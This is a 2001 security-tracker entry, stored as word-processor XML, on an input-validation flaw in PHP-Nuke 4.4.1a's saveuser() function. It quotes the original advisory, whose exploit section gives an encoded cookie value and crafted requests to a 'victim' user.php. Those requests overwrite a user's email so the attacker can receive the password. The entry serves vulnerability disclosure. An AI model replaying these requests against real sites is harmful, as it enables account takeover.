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</w:rPr>
        <w:t>PHP-Nuke Web Site Management Software Allows Unauthorized Commands to Be Executed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 xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Mar 2 2001 21:40 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(UTC/GMT)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Impac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u w:val="single"/>
        </w:rPr>
        <w:t>Disclosure of authentication information &lt;/archives/impact/17.html&gt;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FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Disclosure of user information &lt;/archives/impact/19.html&gt;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FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Modification of user information &lt;/archives/impact/22.html&gt;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FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>User access via network &lt;/archives/impact/24.html&gt;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Exploit Included:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yes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Advisory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u w:val="single"/>
        </w:rPr>
        <w:t>r0tten dev1ce Crew &lt;/archives/advisory/309.html&gt;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Version(s):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.4.1a and possibly earlier versions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Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP-Nuke, an automated package for managing dynamically generated web sites on Linux, reportedy contains some input validation vulnerabilities that allow a remote attacker to execute unauthorized commands on the system. </w:t>
        <w:br/>
        <w:br/>
        <w:t>Certain functions within PHP-Nuke do not perform adequate input validation such that an attacker can pass arbitrary iformation through to the MySQL query (MySQL is used by PHP-Nuke). The function "saveuser()" is one of those functions. There may be others.</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">A demonstration exploit is provided in the original report from the r0tten dev1ce Crew / Argentinian Security Group.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Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker can pass arbitrary information through to the MySQL server via the web server. For example, the attacker can change the e-mail address of one of the PHP-Nuke users and can request that the password be mailed to the changed e-mail address if the attacker knows or can guess the UID of the user.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Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> No solution was available at the time of this entry.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Vendor URL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://phpnuke.org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Caus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u w:val="single"/>
        </w:rPr>
        <w:t>Access control error &lt;/archives/cause/25.html&gt;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FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Input validation error &lt;/archives/cause/30.html&gt;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Underlying OS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u w:val="single"/>
        </w:rPr>
        <w:t>Linux (Any) &lt;/archives/underlyingos/168.html&gt;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Reported By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u w:val="single"/>
        </w:rPr>
        <w:t>venomous &lt;venomous@RDCREW.COM.AR&gt; &lt;/archives/idreportedby/5.html&gt;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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Message History:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> None. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs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>Message Cont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</w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier" w:cs="Courier" w:ascii="Courier" w:hAnsi="Courier"/>
        </w:rPr>
        <w:t>Fri, 2 Mar 2001 08:44:04 -0300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From: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier" w:cs="Courier" w:ascii="Courier" w:hAnsi="Courier"/>
        </w:rPr>
        <w:t>venomous &lt;venomous@RDCREW.COM.AR&gt;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Subject: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier" w:cs="Courier" w:ascii="Courier" w:hAnsi="Courier"/>
        </w:rPr>
        <w:t>PHPNUKE4.4.1a Advisory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br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r 0 t t e n  d e v 1 c e  C r e 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r0tten dev1ce Cre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A r g e n t i n i a n  S e c u r i t y  G r o u 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Argentinian Security Grou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[( advisory )]&gt;---------------------------------------&lt;[( rdC270201.adv.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a: PHP-NU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dor Homepage: http://www.phpnuke.or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dor Contacted: 27/feb/20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dor Response: ??/??/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dor Fix: ??/??/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tested: 4.4.1a (latest version to dat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nd by: venomou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ish translation: ka0z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roblem description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~~~~~~~~~~~~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ecks that are realized in the function saveuser() are not enough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ck abitrary information being passed to the query of MySQ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!] There are also many other functions that can be exploited the same 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bed in the advisory. This adivisory describes only the fun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euser(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Impac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possible for the attacker to change the e-mail address of one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s and ask for the password to be sent to the e-mail address that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er have provid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course this isn't easy since we do not know the UID of each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s, but this this type of information is easily obtained wi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teforce check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Exploi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house:~$ /bin/echo -e "0:&lt;user&gt;:2:3:4:5:6:7:8:eee" | uuencode -m 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-base64 644 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DpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK     [***]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x http://victim/user.php?op=saveuser&amp;user=[***]&amp;uid=X&amp;uname=&lt;user&gt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ariables you can change the value ar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='',email='', femail='', url='', bio='' , user_avatar=''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_icq='', user_occ='', user_from='', user_intrest='', user_sig=''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_aim='', user_yim='', user_msnm=''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other words, if we want to change the e-mail address, we d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x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victim/user.php&amp;op=saveuser&amp;user=[***]&amp;uid=X&amp;uname=&lt;user&gt;&amp;email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email you want&gt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ask for the password to be sent to e-mail, you would be able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ss the accou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od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simple script to demostrate the vulnerabilit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get it from http://www.rdcrew.com.ar, code sec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ix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 for a patch from the auth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ontact u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~~~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isories, tools, IDS, texts and other stuff can be found a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www.rdcrew.com.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omous@rdcrew.com.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Greet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~~~~~~~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: ka0z, den0, E|Bruj0, storm, ab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nels: #flatline at coredump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EOF]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">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto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